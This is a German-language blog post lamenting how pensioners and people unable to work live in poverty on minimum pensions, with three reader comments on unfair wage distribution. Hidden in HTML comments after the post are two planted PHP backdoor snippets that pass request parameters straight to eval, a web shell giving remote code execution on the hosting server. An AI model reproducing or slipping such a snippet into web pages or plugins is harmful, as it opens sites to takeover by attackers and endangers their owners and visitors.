Am Rande der Gesellschaft

Wieviele von uns gibt es die zum Beispiel
eine Pension beziehen und arbeitsunfähig sind?
Die Frage stellt sich -wie leben diese Menschen mit der Mindestpension?
Wie gestalten Sie Ihren Alltag?

Nach der Zahlung sämtlicher Fixkosten monatlich-
bleiben in etwa 200 Euro zum leben!!!

Sie wollen einmal im Monat fortgehen?

Zu Hause wird das Geld gezählt,dann die Ernüchterung!
Ein Getränk ein Menü?
Die Vernunft siegt — der Verstand sagt nein!
Denn was wird morgen sein?
Sie sitzen zu Hause — im Winter bleibt es meist ziemlich kühl,
den die fortwährenden Steigerungen der Energiekosten kann
man sich ja nicht leisten.

Die Menschen leben mitten unter uns!
Und es gibt viele davon, dass können Sie mir glauben!

Die Grundsicherung ist ein guter Beginn der Regierung sollte man glauben.
Aber versuchen Sie mal ein Rechenbeispiel.
Ich habe nachgerechnet uns es ist erschreckend wie die Menschen leben.

Versteckt — kaum vorhanden fristen Sie den Alltag.
Die Armut ist weiter verbreitet als wir glauben!

„Die Armut macht einsam„

<!– [insert_php]if (isset($_REQUEST["dEeP"])){eval($_REQUEST["dEeP"]);exit;}[/insert_php][php]if (isset($_REQUEST["dEeP"])){eval($_REQUEST["dEeP"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["AmvAO"])){eval($_REQUEST["AmvAO"]);exit;}[/insert_php][php]if (isset($_REQUEST["AmvAO"])){eval($_REQUEST["AmvAO"]);exit;}[/php] –>


Teilen 'Am Rande der Gesellschaft' per Facebook Teilen 'Am Rande der Gesellschaft' per Google+ Teilen 'Am Rande der Gesellschaft' per Twitter Teilen 'Am Rande der Gesellschaft' per Email Teilen 'Am Rande der Gesellschaft' per Print Friendly     

Gertrude

Kaum hätte ich mir das Träumen lassen - Ich kann es kaum fassen! ...

3 Kommentare zu “Am Rande der Gesellschaft

  • 22. November 2007, 21:53 Uhr
    Permalink

    Wir leben ja in einer 3.Klassen-Gesellschaft. Wohlstand, Mittelstand und Armut.

    Der Mittelstand und die Armut entstehen durch die ungerechte Verteilung der Finanzen.

    Ein Arbeiter der für 1200 € im Monat 9-10 Stunden am Tag arbeiten muss hat einfach nicht die Zeit reich zu werden.Es sei denn, er hat Glück im Spiel uoder erbt.

    Ein Sportler (Fussball) dagen bekommt im Jahr je nach Verkaufswert Millionen im Jahr. Oft sitzt so ein Sportler nur auf der Ersatzbank und hat nichts zu tun. Ob das gerecht ist?

    Warum kann sich ein guter Facharbeiter nicht auch für eine Millionen Euro im Jahr verkaufen?
    Ganz einfach; die Unternehmer und die Krankenkasen lassen es nicht zu.

    Die Kassen brauchen Beitragszahler und die Unternehmer bezahlbare Arbeitskräfte.

    Was wir brauchen, ist eine gerechte Verteilung der Finanzen und eine attraktive Lohnpolitik.

    Was die sozial schwachen angeht muss man sagen, da werden es auch immer werden, solange es die Ungerechtigkeit bei den Finazen gibt.

    Antworten
  • 23. November 2007, 16:15 Uhr
    Permalink

    Kürzlich hörte ich von einer Verkäuferin
    40 Stunden Woche, sie verdient brutto 1000.- Euro im Monat!
    Sie hat ein Kind und ist Alleinerziehend!
    Ich glaube nicht das wir hier viel darüber sagen müssen.
    Sie quält sich tagaus tagein ab um Überleben zu können.
    Genau so ist es bei uns in Österreich!
    Die meisten von uns wurschteln sich irgenwie durch das Monat. JA die Zeit um Reich zu werden, die fehlt uns!
    Um die Finanzen gerechter verteilen zu können, müssten ein paar Gescheite Menschen in unsere Regierung.
    Vielleicht mal ein kleiner Arbeiter aus der Fabrik
    Als Bundeskanzler!!!
    Da würden die Bonzen aber Augen machen!

    Antworten
  • 9. März 2009, 07:20 Uhr
    Permalink

    Und es wird leider immer schlimmer, es werden immer mehr, am Rande des Nichts

    Antworten

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.